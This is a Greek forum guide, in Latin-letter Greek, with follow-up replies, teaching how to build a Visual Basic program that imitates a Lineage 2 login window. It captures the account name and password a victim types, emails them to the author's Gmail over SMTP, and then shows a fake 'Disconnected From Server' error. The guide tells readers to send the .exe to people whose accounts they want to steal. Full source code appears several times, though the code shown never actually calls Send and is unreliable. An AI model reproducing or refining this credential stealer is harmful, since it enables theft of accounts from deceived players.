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[Guide]Pws na ftiaksete ena programa gia na klevete acounts(Me to visual Basic)

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Geia sas me afto to guide sas dixnw pws  na kanete ena programataki me to  visual basic wste na klevete l2 accounts

Q:Ti kanei afto to programa?

A:To stelneis se afton pou 8es na ton klepseis ,aftos vazei tis plirofories tou char tou kai aftomata erxode sto g mail sas

Shmeiwsh:Prepei na exete g mail,an den exete ftiakste ena.

Shmeiwsh:Afto pou 8a ftiaksete den einai keylogger stelnei mono afta pou 8a valei sta textbars.

English Version here

1)Prwton 8a xriastite to visual basic katevaste to apo  edw

Otan to kanete install  ,Anixte to kai pathste control + n gia na ftiaksete ena new project.Epilekste Windows form Applications kai patheste ok

dw9ud9u.png and press ok

2)8a xriastoume 2 buttons,2 labels kai 2  textboxes

Pigente sta ergaleia(tools) kai epilekste afto 98fhifhe.png.Clickarete  panw tou kai sirte to panw sto form para8iro

Meta vreite afto to ergaleio r3r3r.png .Kade to idio opws parapanw

Kai telos afto to ergaleio e3e98398e.png, to sernete kai afto panw sto form window

3)Twra ftiakste to programa  sas wste na einai opws katw sthn eikona


4)Twra prepei na onomasoume   ta labels kai ta  buttons.

Label 1 prepei na metonomastei se "ID"

Label 2 prepei na metonomastei se "Password"

Button 1  prepei na metonomastei se "Log In"

Button 2 prepei na metonomastei se "EXIT"

Shmeiwsh:To button exit einai idio me to log in

Gia na ta metonomasoume clickaroume  1 fora  panw sto  Label1 kai  pame  stis  properties kai  sthn idia gramh pou grafei text vazoume ID


Kanoume to idio se ola ta buttons kai labels wste na einai etsi


5)Twra gia na kanoume to form window kalitero boroume na valoume kai mia eikona

Gia na valoume eikona  epilekste apo ta ergaleio to ergaleio "Picture box tool"0090909.png

Epilegoume ton xwro ton opoio 8a piasei h eikona mas


Meta vriskoume mia kalh eikona opws paradigma afthn edw


Kai pigenoume stis properties ,Image ekei einai ena mikro koutaki   to patame.


Twra ena para8iraki san kai afto 8a emfanistei

s00r9u3r3.pngEpilegume local resource kai patame click "Import" dialegoume thn eikona kai patame ok

c32399f7.pngTwra einai etsi

6) Twra vazoume ton kodiko wste to programa na leitourgei

Clickaroume 2 fores panw sto button log in mexri na vgei afto


Edw kanoume copy/paste ton kodiko

If TextBox1.Text = "" Then
           MsgBox("Username Is Missing")
If Textbox2.text = "" Then
Msgbox("Password Is Mising")
       End If
       End if
       Dim smtpServer As New SmtpClient()
       Dim mail As New MailMessage()
       smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
       'using gmail
       smtpServer.Port = 587
       smtpServer.Host = "smtp.gmail.com"
       smtpServer.EnableSsl = True
       mail = New MailMessage()
       mail.From = New MailAddress("Your Gmail")
       mail.To.Add("Your Gmail")
       mail.Subject = "Username: " & TextBox1.Text
       mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
       MsgBox("Disconnected From Server, Please try again later!")

New code by Stealth (o katw)

If TextBox1.Text = String.Empty Or TextBox2.Text = String.Empty Then MsgBox("Please fill all the information needed.", MsgBoxStyle.Critical) : Exit Sub
       Dim smtpServer As New SmtpClient()
       Dim mail As New MailMessage()
       smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
       'using gmail
       smtpServer.Port = 587
       smtpServer.Host = "smtp.gmail.com"
       smtpServer.EnableSsl = True
       mail = New MailMessage()
       mail.From = New MailAddress("Your Gmail")
       mail.To.Add("Your Gmail")
       mail.Subject = "Username: " & TextBox1.Text
       mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
       MsgBox("Disconnected From Server, Please try again later!")

Note :Afton ton code den ton exw dokimasei dioti to vb m 8elei new key peite mou an exei kapoio provlima(pistevw einai ok)

Ston kwdiko opou grafei Your Gmai vazete to gmail sas kai opou grafei g mail password to password tou g mail sas

Prepei na krathsete afta "

Mporoume episis na alaksoume kai to minima tou ok(msgbox)

Note : Ston kodiko iparxei ena provlima.

Edw einai pws na to ftiaksete.

1) Pigenete sthn leksi SmtpClient,uparxei ena symbolo katw apo thn leksi(eroor.png)

2)Vazete to podiki akrivws panw sthn leksi  mexri afto na vgei kai apla kanete click sto "Import.System.Net.Mail" Sthn prwth epilogh tis eikonas


Shmeiwsh 2)Kante to idio kai gia tin leksi"MailAddress"

Molis ta fixarete ta errors eiste ok

7)Twra eimaste sxedon etoimh

Alakste layer (Phgente sto "Form1.vb" [Design]

Kai pathste  start debugging opws sthn eikona


An einai ola ok tote to programa 8a zwdanepsei(lol)

Kante ena test vazodas ena pseftiko id kai password,pathste log in kai an er8ei sto g mail sas tote eiste gg



Edw teliwsame!

8)Gia to to swsete ews .exe arxeio

Pathste  Control + Shift + S

kai kade to save it sto desktop.

Sto desktop enas fakelos 8a emfanistei.

Pathste ston fakelo.8a deite kai allon fakelo me to onoma tou programatos sas.

Meta 8a vreite polous fakelous


Beite ston fakelo  "obj"

Meta ston fakelo debugg

Kai 8a deite to programa se exe morfh!


Twra arxhste na stelnete to exe sta atoma pou 8elete na klepsete.

-The End.

Credits : To Me

To eixa kanei sto aggliko section eipa na to kanw kai ena translate edw

Opws lene kai ta rules :P

Updated: 18/7/2010

This is the hidden content, please





Auto to programmataki ginete mono gia to l2 i mporoume na to xrisimopiisoume k gia allo game?

gia oti 8elete apla valte allh eikona :P

episis exw pei na ginei moved sto l2 exploits greek katala8os to postara edw :/


File epeidi ekana format boreis na mou to stileis etoimo pliz?

lol den ginete prepei na ftiakseis diko sou giati alliws 8a kserw ton kodiko sou an sou ftiaksw :P

den einai diskolo apla katevase to programa kai akolou8ise ta vimata


lol den ginete prepei na ftiakseis diko sou giati alliws 8a kserw ton kodiko sou an sou ftiaksw :P

den einai diskolo apla katevase to programa kai akolou8ise ta vimata

ax nai soz berdeftika :/


pathses panw sthn leksi wste  na vgei to error fix?

kai meta apo to error fix na pathseis thn prwth epilogh?


loipon des pws kanw thn diadikasia se pic kai pes m an kanw kapio la9os!


http://img517.imageshack.us/img517/9179/69665116.png  ~~>1

http://img19.imageshack.us/img19/64/12120836.png          ~~>2

http://img706.imageshack.us/img706/6681/14380257.png  ~~>3


PS:sthn 3 pic kane zoom na deis ka9ara ta gramata!


Nomizw pws sthn arxh prepei na eixes valei kai alla pragmata (tools kai na ta esvises me apotelesma afto) eprepe mono afta pou eipa.(an evales kai alla)

kai egw to eixa pa8ei afto sthn arxh den iksera ti einai kai to arxisa to programa na to ftiaxnw apo thn arxh dokimase afto :/

o kodikos sou prepei na einai etsi mesa ekei pou vazoume tous kodikous

Imports System.Net.Mail

Public Class Form1

    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        If TextBox1.Text = "" Then
            MsgBox("Username Is Missing")
            If TextBox2.Text = "" Then
                MsgBox("Password Is Mising")
            End If
        End If
        Dim smtpServer As New SmtpClient()
        Dim mail As New MailMessage()
        smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
        'using gmail
        smtpServer.Port = 587
        smtpServer.Host = "smtp.gmail.com"
        smtpServer.EnableSsl = True
        mail = New MailMessage()
        mail.From = New MailAddress("Your Gmail")
        mail.To.Add("Your Gmail")
        mail.Subject = "Username: " & TextBox1.Text
        mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
        MsgBox("Disconnected From Server, Please try again later!")
    End Sub
End Class

an sou einai alliws kane kati exeis kanei la8os isws ekanes se la8os meros to copy paste



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